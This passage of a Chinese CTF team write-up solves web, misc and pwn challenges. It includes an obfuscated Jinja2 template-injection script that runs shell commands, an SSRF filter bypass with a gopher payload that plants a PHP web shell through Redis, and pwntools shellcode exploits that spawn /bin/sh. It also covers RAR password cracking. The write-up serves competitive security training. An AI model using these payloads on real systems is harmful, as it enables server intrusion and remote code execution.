class="keyword">else</span> {</span><br><span class="line"> alert(<span class="string">"request error"</span>);</span><br><span class="line"> }</span><br><span class="line"> };</span><br><span class="line"> }</span><br><span class="line"> ;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64decode <span class="keyword">as</span> bd</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode <span class="keyword">as</span> be</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">abc</span>(<span class="params">a, b</span>):</span></span><br><span class="line"> len_a = <span class="built_in">len</span>(a)</span><br><span class="line"> len_b = <span class="built_in">len</span>(b)</span><br><span class="line"> result = <span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(len_b):</span><br><span class="line"> result += <span class="built_in">chr</span>(<span class="built_in">ord</span>(a[i % len_a]) ^ <span class="built_in">ord</span>(b[i]))</span><br><span class="line"> <span class="keyword">return</span> result</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">de</span>(<span class="params">a, b</span>):</span></span><br><span class="line"> <span class="keyword">return</span> abc(a, bd(b))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_key</span>(<span class="params">a</span>):</span></span><br><span class="line"> <span class="keyword">return</span> be(abc(<span class="string">"xdsecminil"</span>, a).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="built_in">input</span>(<span class="string">"\033[1;34m[^_^] ? Input Target Url: \033[0m"</span>) + <span class="string">"build"</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> code = <span class="built_in">input</span>(<span class="string">"\033[1;34m[^_^] > \033[0m"</span>)</span><br><span class="line"> <span class="keyword">if</span> code == <span class="string">"BRUTE"</span>:</span><br><span class="line"> <span class="keyword">for</span> p <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">200</span>):</span><br><span class="line"> pcode = <span class="string">r'{{""["__cla""ss__"]["__ba""se__"]["__subcl""asses__"]()['</span> + <span class="built_in">str</span>(i) + <span class="string">r']["__in""it__"]["__glo""bals__"]["__buil""tins__"]["eval"]("__import__(\"o\"\"s\")")["popen"]("cat /fl""ag")["read"]()}}'</span></span><br><span class="line"> data = {</span><br><span class="line"> <span class="string">"data"</span>: get_key(pcode).decode(),</span><br><span class="line"> }</span><br><span class="line"> response = requests.post(url=url, data=data)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"500"</span> <span class="keyword">in</span> response.text:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] @"</span>, p, <span class="string">" is not correct.\033[0m"</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print(<span class="string">"\033[1;33m[@_@] Probably find flag.\033[0m"</span>)</span><br><span class="line"> print(<span class="string">"\033[1;33m"</span>, response.text, <span class="string">"\033[0m"</span>)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> time.sleep(<span class="number">0.2</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> key = get_key(code).decode()</span><br><span class="line"> data = {</span><br><span class="line"> <span class="string">"data"</span>: key,</span><br><span class="line"> }</span><br><span class="line"> response = requests.post(url=url, data=data)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"500 Internal Server Error"</span> <span class="keyword">in</span> response:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] Execute Error.\033[0m"</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print(response.text)</span><br></pre></td></tr></table></figure><hr><h3 id="WEB4-protocol-Worked-Wanan-amp-Noah"><a href="#WEB4-protocol-Worked-Wanan-amp-Noah" class="headerlink" title="WEB4-protocol | Worked: Wanan&Noah"></a>WEB4-protocol | Worked: <code>Wanan</code>&Noah</h3><p><del>随便输一个地址进去,发现访问了相应的网页。</del></p><p>后来换了环境,无法访问外网。</p><p>测试一下,发现<code>file://</code>、<code>127.0.0.1</code>和<code>localhost</code>都被过滤了。</p><p><code>file://</code>的过滤可以用<code>file:+绝对路径</code>的方式绕过,<code>127.0.0.1</code>的过滤可以用<code>0.0.0.0</code>来绕过。</p><p>payload:<code>url=file:/var/www/html/index.php</code></p><p>在网页源码中看到<code>php</code>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html></span><br><span class="line"><html lang=<span class="string">"en"</span>></span><br><span class="line"><head></span><br><span class="line"> <meta charset=<span class="string">"UTF-8"</span>></span><br><span class="line"> <title>Title</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"> <a>访问点东西?</a><br/><br/></span><br><span class="line"><div></span><br><span class="line"> <form action=<span class="string">"index.php"</span> method=<span class="string">"POST"</span> ></span><br><span class="line"><input type=<span class="string">"text"</span> name=<span class="string">"url"</span> placeholder=<span class="string">"Your url"</span> /></span><br><span class="line"></form><br/></span><br><span class="line"></div></span><br><span class="line"></body></span><br><span class="line"></html></span><br><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">curl</span>(<span class="params"><span class="variable">$url</span></span>)</span>{ </span><br><span class="line"> <span class="variable">$ch</span> = curl_init();</span><br><span class="line"> curl_setopt(<span class="variable">$ch</span>, CURLOPT_URL, <span class="variable">$url</span>);</span><br><span class="line"> curl_setopt(<span class="variable">$ch</span>, CURLOPT_HEADER, <span class="number">0</span>);</span><br><span class="line"> <span class="keyword">echo</span> curl_exec(<span class="variable">$ch</span>);</span><br><span class="line"> curl_close(<span class="variable">$ch</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'url'</span>])){</span><br><span class="line"><span class="variable">$url</span> = <span class="variable">$_POST</span>[<span class="string">'url'</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">'/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is'</span>, <span class="variable">$url</span>,<span class="variable">$match</span>)) {</span><br><span class="line"><span class="keyword">die</span>(<span class="string">'这样子可不行哦'</span>);</span><br><span class="line">}</span><br><span class="line">curl(<span class="variable">$url</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'minisecret'</span>])){</span><br><span class="line">system(<span class="string">'ifconfig eth1'</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>过滤了<code>file://</code>、<code>dict</code>、<code>../</code>、<code>127.0.0.1</code> 和<code>localhost</code>。</p><p><code>POST</code>传参,看到网络参数:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">eth1: flags=4163 mtu 1450 inet 172.192.15.2 </span><br><span class="line">netmask 255.255.255.0 broadcast 172.192.15.255 </span><br><span class="line">ether 02:42:ac:c0:0f:02 txqueuelen 0 (Ethernet) </span><br><span class="line">RX packets 0 bytes 0 (0.0 B) </span><br><span class="line">RX errors 0 dropped 0 overruns 0 frame 0 </span><br><span class="line">TX packets 0 bytes 0 (0.0 B) </span><br><span class="line">TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</span><br></pre></td></tr></table></figure><p>发现这是一个内网环境下的主机,所在网段为<code>172.192.74.0/24</code>。</p><p>试了一下,发现<code>172.192.15.3</code>也开着<code>http</code>服务。并且有提示:<code>flag</code>就在这台机子上面,可是你怎么获得呢?</p><p>手动尝试<code>ssrf</code>常攻击的几个端口,发现<code>6379</code>上起了<code>redis</code>服务,然后拿<code>gopherus</code>生成<code>payload</code>直接打<code>redis``,</code>把<code>/flag</code>写入<code>shell.php</code>,因为<code>lt</code>师傅过滤了../所以直接猜<code>flag</code>在<code>/flag</code>,拿到<code>flag</code></p><h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=gopher://127.192.15.3:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A</span><br></pre></td></tr></table></figure><hr><h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="MISC1-好白给的签到题-Worked-Noah"><a href="#MISC1-好白给的签到题-Worked-Noah" class="headerlink" title="MISC1-好白给的签到题 | Worked: Noah"></a>MISC1-好白给的签到题 | Worked: Noah</h3><h4 id="EXP-2"><a href="#EXP-2" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64decode <span class="keyword">as</span> bd</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> fin = <span class="built_in">open</span>(<span class="string">"story.txt"</span>, <span class="string">"rb"</span>)</span><br><span class="line"> data = fin.read()</span><br><span class="line"> fin.close()</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> data_ = bd(data)</span><br><span class="line"> data_.decode(<span class="string">"utf-8"</span>)</span><br><span class="line"> <span class="keyword">except</span> Exception:</span><br><span class="line"> data_ = bd(data[::-<span class="number">1</span>])</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"{"</span> <span class="keyword">in</span> data_.decode():</span><br><span class="line"> print(data_.decode())</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> fout = <span class="built_in">open</span>(<span class="string">"story.txt"</span>, <span class="string">"wb"</span>)</span><br><span class="line"> print(data_)</span><br><span class="line"> fout.write(data_)</span><br><span class="line"> fout.close()</span><br></pre></td></tr></table></figure><hr><h3 id="MISC2-抓猫猫-Worked-Wanan-amp-Noah"><a href="#MISC2-抓猫猫-Worked-Wanan-amp-Noah" class="headerlink" title="MISC2-抓猫猫 | Worked: Wanan&Noah"></a>MISC2-抓猫猫 | Worked: <code>Wanan</code>&Noah</h3><p><code>k</code>倍博弈。</p><p>将每次<code>cdcq</code>取完后剩下的猫猫数量转成2进制,取走当前可取数量下的全部的二进制1。</p><p>即保证<code>cdcq</code>每次抓猫猫都会从二进制0位借位。</p><hr><h3 id="MISC3-好康的硬盘-Worked-Wanan-amp-Noah"><a href="#MISC3-好康的硬盘-Worked-Wanan-amp-Noah" class="headerlink" title="MISC3-好康的硬盘 | Worked: Wanan&Noah"></a>MISC3-好康的硬盘 | Worked: <code>Wanan</code>&Noah</h3><p>拿到压缩包,解压之后拿到一个文本文档和一个<code>rar</code>压缩包。</p><p><code>txt</code>是经过隐写的:<a href="http://330k.github.io/misc_tools/unicode_steganography.html">Unicode Steganography with Zero-Width Characters</a></p><p>提取后拿到解压密码的<code>hint</code>:<code>minil****</code>。</p><p>用<code>rar2john</code>提取<code>hash</code>,然后用<code>hashcat</code>进行掩码爆破,因为爆破全字符集太慢了,于是试了一下仅数字,运气好,爆出来了:<code>minil4396</code>。</p><p>解压之后拿到硬盘镜像,用<code>X-ways Forensics</code>或<code>火眼取证</code>导出其中的视频文件和<code>txt</code>。</p><p>视频文件拆分帧,找到7张有数字的聊天记录。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ffmpeg -i inputfile.avi -r 1 -f png %d.png</span><br></pre></td></tr></table></figure><p><code>txt</code>是一堆奇怪的英文。这个<code>txt</code>题目是奇怪的邮件,把内容全部往谷歌里一丢,找到<a href="https://www.spammimic.com/">垃圾邮件隐写</a>。</p><p>在这可以解密,需要密码,密码就是图片里的数字,附件更新之后拿到密码为<code>7355608</code>。即可解出flag。</p><p><code>MiniLCTF{n3ver_g0nna_L3t_Y0u_dowN}</code></p><hr><h3 id="MISC4-Recombination-Worked-Noah"><a href="#MISC4-Recombination-Worked-Noah" class="headerlink" title="MISC4-Recombination | Worked: Noah"></a>MISC4-Recombination | Worked: Noah</h3><p>拿到压缩包,试图解压发现提示有密码。<code>winrar</code>还提示<code>rar</code>文件头损坏。</p><p>学习一下<code>rar</code>的文件头格式: <a href="https://blog.csdn.net/Claming_D/article/details/105899397"><code>rar文件头</code></a></p><p>发现文件头外存在一个<code>CRC</code>校验信息,进行校验,<code>CRC</code>不一致。</p><p>在<code>010</code>的模板中的<code>struct RarBlock block[0]</code> > <code>struct FileHeadBlock file</code> > <code>struct WinFileAttrs Attributes</code> > <code>uint32 ENCRYPTED</code>处进行修改。</p><p>再次解压,成功得到<code>flag</code>文件内容:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">67535629127067535629127067535629127067535629127067535629127067535629127067535629127067535629127069504871727229504871727229504871727229504871727229504871727229504871727229504871727229504717272229189643338604189643388044189643880444189643800444189643800444189648000444896648000444896680000444856640046267556640462265556644662655556644626655556644626655556644266655566444266655566442666655562264128892882264188992822261888928222261888928222261888928222261888928222611888928222618888928222490201962120490209622120902009621200902096211200920962112000920621112000206621112000266211112000298858437138098858371138098558371380098558313380095588313800095588133800055888133000055881333000054636334439724636344339724636344397224636343997224363343972224363339972223633339922223633399922223443860892231443868922231443868922311443889223111438889231111438892311111388923111111388931111111324165785927324165785927324165785927324165785927324165785927324165785927324165785927324167859273328488387524508488387524508488387524508488387524508488387524508488387524508488387524508488387524508521309913458521309913485221309913485221309913485221309934852213099334852213093334852213093334852202490120063902490120039024490120039024490120039024490120339024490200339024490000339024490000339022905041793622905041736229055041736229550417362295550417362295550473362295550433362295550433362295231874163855231874138555218774138555188774138555888774138555888771338555888773338555888773338555893138793884093138738884093387738884933387388884933887388849338873888849388738888849387388888493380269308765240269387652402693877652426698777522426988777522426988775522269988755522269887555222669449672101377449621013774496210113774996100137749961100137749961101337799661103337999661103337999674371396420274313996420274313964420243319644202233319642002233319422002333319222022333319222022331779798898051797998898051797998988051979989880519979989805199799898805197998988055197998988055197406022843111406022843111406022843111406022843111406022843111406022843111406022843111406022843111498622523273998622523273998622523273998622523273998622523273998622523273998622523273998622523273997809521327337809521373377809521373377809521373377809521373377809521373377095521373377095521373377124901443251124901432511124901432511124901432511124901432511124901432511249011432511249011432511267882138935467882138954667882138956678821338956678821338956678821338956788813338956788813338956789735041941439735041944399735041943999735019443999735019443999735019443997735194443997735194443997272016194996272016194962272016194962722016194962722016194962722016194627722011944627722011944627761782965943761782965937661782965937667822965937667822965937667822965376678229653776678229653776677689639697567689639695677689639695677686399695677686399695677686399956776863999567776863999567776572744056004572744056045572744050455572740500455577405004555577405045555577405045555577405045555587101079076987101090769871101090768711010900768711109007687711109076687711109076677111109076677113238052515113238052515113238052515113238052515113238052515113238052515113238052515113238052515113878052857257878052857257878052857257878052857257878052857257878052857257878052857257878052857257876818937270676818937270676818937270676818937270676818937270676818937270676818937270676818937270670169705132990169705132990169705132901697051329016697051320166997051321669997051321699970511321699230507280235230507280235230507280252305072802523005072802230055072802300555072802300555028802300510723328716110723287716110723287711110723287711100723287711007723287710077723287710077722887710074999503704944999537004449995337004449995337004499995337004999995337004999995337004999995377004999530661828543530668288435306682288435306682284355306682284353006682284330006682284330006622884330096464542097796464420977796464420977796464429777796464429777966464429779666464429779666464297779669920073976499920039776499920039776499920037766499920037766999920037766999920037766999920377766999272282621608272286211608272286211608272282111608272282111608272282111608272282111608272221111608284257389119984257891119984257891119984258911119984258911119984258911119984258911119984259111119981491797144281491771444281491771444281497711444281497711444814497711444144497711444144497111444144795289282054795282822054795282822054792822822054792822822047992822822079992822822079928228822079994184177940894184177940894184177940894184177940894184177940894184177940894184177940894184177940897494468598527494468598527494468598527494468598527494468598527494468598527494468598527494468598527</span><br></pre></td></tr></table></figure><p>尝试了转16进制,<code>shellcode</code>等常规操作。</p><p>然而还是想不到是什么编码或者加密。</p><p>后来在一篇<a href="https://blog.csdn.net/mochu7777777/article/details/115276176">DASCTF三月赛的WP</a>中看到关于aa3d的内容,后来又搜到了<a href="https://john-doe.fun/bytectf-2020-misc-writeup/"><code>ByteCTF 2020 Misc WP</code></a>,感觉字符串的重复情况相当类似。</p><p>于是下载了<a href="http://aa-project.sourceforge.net/aa3d/">aa3d</a>,查看使用方式,发现可以输出纯数字版本的字符画。试着生成了一个,发现与题目中的字符串格式完全相同:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">67535629127063562912706353562912706353562912706353562912706353562912706353562912</span><br><span class="line">68843149206868843149206868843149206868843149206868843149206868843149206868843149</span><br></pre></td></tr></table></figure><p>字符串长度为4559,正好分解为47*97的矩阵。</p><p>放在记事本里,截图。将截图用<code>stegsolve</code>打开,使用<code>Analyze</code>><code>Stereogram Solver</code>,调整图片位移,看到<code>flag</code>:</p><p><img src="https://md.wanan.world/uploads/upload_57db6e2f88a325274bcf3639b83bb41c.png" class="lazyload" data-srcset="https://md.wanan.world/uploads/upload_57db6e2f88a325274bcf3639b83bb41c.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII="></p><hr><h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="PWN1-shellcode-Worked-BB"><a href="#PWN1-shellcode-Worked-BB" class="headerlink" title="PWN1-shellcode | Worked: BB"></a>PWN1-shellcode | Worked: BB</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># PWN1.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch = <span class="string">'amd64'</span>,os=<span class="string">'linux'</span>,log_level = <span class="string">'debug'</span>)</span><br><span class="line">p = process(<span class="string">'./shellcode_loader'</span>)</span><br><span class="line"><span class="comment">#p = remote('pwn.woooo.tech',10266)</span></span><br><span class="line">gdb.attach(p,<span class="string">"b *$rebase(0x1232)"</span>)</span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">'''</span></span><br><span class="line"><span class="string"> mov rax, qword ptr[rsp + 0x50];</span></span><br><span class="line"><span class="string"> jmp rax;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">shellcode2 =<span class="string">''' </span></span><br><span class="line"><span class="string"> xor rbx,rbx;</span></span><br><span class="line"><span class="string"> mov rax, qword ptr[rbp + 0x58];</span></span><br><span class="line"><span class="string"> jmp rax;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">shellcode3 = <span class="string">''' </span></span><br><span class="line"><span class="string"> lea rdi, qword ptr[rsp + 0x70];</span></span><br><span class="line"><span class="string"> push rbx;</span></span><br><span class="line"><span class="string"> pop rsi;</span></span><br><span class="line"><span class="string"> push rsi;</span></span><br><span class="line"><span class="string"> pop rdx;</span></span><br><span class="line"><span class="string"> push rdx;</span></span><br><span class="line"><span class="string"> pop rax;</span></span><br><span class="line"><span class="string"> mov al, 59;</span></span><br><span class="line"><span class="string"> syscall;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">shellcode = asm(shellcode) + <span class="string">b'//bin/sh'</span></span><br><span class="line">shellcode2 = asm(shellcode2)</span><br><span class="line">shellcode3 = asm(shellcode3)</span><br><span class="line"></span><br><span class="line">p.send(shellcode)</span><br><span class="line">p.sendline(shellcode2)</span><br><span class="line">p.sendline(shellcode3)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><blockquote><ol><li><p>没有操作数的指令 1个字节</p></li><li><p>操作数只涉及寄存器的的指令 2个字节<br>如:<code>mov bx,ax</code></p></li><li><p>操作数涉及内存地址的指令 3个字节<br>如:<code>mov ax,ds:[bx+si+idata]</code></p></li><li><p>操作数涉及立即数的指令<br>指令长度为:寄存器宽度+1<br>8位寄存器,寄存器类型=1,如:<code>mov al,8;</code>指令长度为2个字节<br>16位寄存器,寄存器类型=2,如:<code>mov ax,8;</code>指令长度为3个字节</p></li><li><p>跳转指令<br>分为2种情况:</p></li></ol><ul><li><p>段内跳转<br>指令长度为2个字节或3个字节</p><p><code>jmp</code>指令本身占1个字节</p><p>段内短转移,8位位移量占一个字节,加上<code>jmp</code>指令一个字节,整条指令占2个字节<br>如:<code>jmp short opr</code></p><p>段内近转移,16位位移量占两个字节,加上<code>jmp</code>指令一个字节,整条指令占3个字节<br>如:<code>jmp near ptr opr</code></p></li><li><p>段间跳转</p><p>指令长度为5个字节<br>如:<code>jmp dword ptr table[bx][di]</code><br>或<code> jmp far ptr opr</code><br>或<code> jmp dword ptr opr</code></p></li></ul><ol start="6"><li><p><code>inc</code>指令<br>占用一个字节</p></li><li><p><code>push</code>指令<br>占用一个字节</p></li><li><p><code>segment</code>声明<br>占用两个字节<br>如<code>codesg segment</code></p></li><li><p><code>int 21h</code><br>占用两个字节</p></li></ol></blockquote><p>然后做题的时候和做题后我就是个傻逼,记录一下被骂的过程和被骂的原因:</p><p>这是我第一遍的<code>exp</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch = <span class="string">'amd64'</span>,os=<span class="string">'linux'</span>,log_level = <span class="string">'debug'</span>)</span><br><span class="line">p = process(<span class="string">'./shellcode_loader'</span>)</span><br><span class="line"><span class="comment">#p = remote('pwn.woooo.tech',10063)</span></span><br><span class="line"><span class="comment">#gdb.attach(p,"b *$rebase(0x1232)")</span></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">'''</span></span><br><span class="line"><span class="string"> mov rax, qword ptr[rsp + 0x50];</span></span><br><span class="line"><span class="string"> jmp rax;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">shellcode = asm(shellcode, arch=<span class="string">'amd64'</span>, os=<span class="string">'linux'</span>) + <span class="string">b"//bin/sh"</span></span><br><span class="line"><span class="comment"># 3 + 4 + 1 + 7 = 15</span></span><br><span class="line">p.sendline(shellcode)</span><br><span class="line"></span><br><span class="line">shellcode2 = <span class="string">''' </span></span><br><span class="line"><span class="string"> lea rdi, byte ptr[rsp + 0x40];</span></span><br><span class="line"><span class="string"> push rbx;</span></span><br><span class="line"><span class="string"> pop rsi;</span></span><br><span class="line"><span class="string"> push rsi;</span></span><br><span class="line"><span class="string"> pop rdx;</span></span><br><span class="line"><span class="string"> push rdx;</span></span><br><span class="line"><span class="string"> pop rax;</span></span><br><span class="line"><span class="string"> mov al, 59;</span></span><br><span class="line"><span class="string"> syscall;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="comment"># 5 + 1*6 + 3 + 1 = 15</span></span><br><span class="line">shellcode2 = asm(shellcode2, arch=<span class="string">'amd64'</span>, os=<span class="string">'linux'</span>)</span><br><span class="line">p.send(shellcode2)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><p>本地通了,但是远程死活不通,然后我在<code>ubuntu18</code>、<code>16</code>上都能通,(就是没有试<code>ubuntu20</code>,因为我印象中<code>ubuntu20</code>的<code>shellcode</code>执行有点问题)。最后还是尝试了一下<code>ubuntu2004</code>,发现了问题,<code>rbx</code>不一定是<code>0</code>。</p><p>好了,来说说<code>bb</code>被骂路程</p><p><img src="https://i.loli.net/2021/05/08/LaHl4dtFIEcb1JC.png" class="lazyload" data-srcset="https://i.loli.net/2021/05/08/LaHl4dtFIEcb1JC.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="eqqieyyds0.png"></p><p>这是<code>bb</code>本地能通,远程没通。</p><p><img src="https://i.loli.net/2021/05/08/vVDIqnHemSRodXN.png" class="lazyload" data-srcset="https://i.loli.net/2021/05/08/vVDIqnHemSRodXN.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="eqqieyyds1.png"></p><p>这是远程通了拿到<code>flag</code></p><p>对了,这是最佳答案:</p><p><img 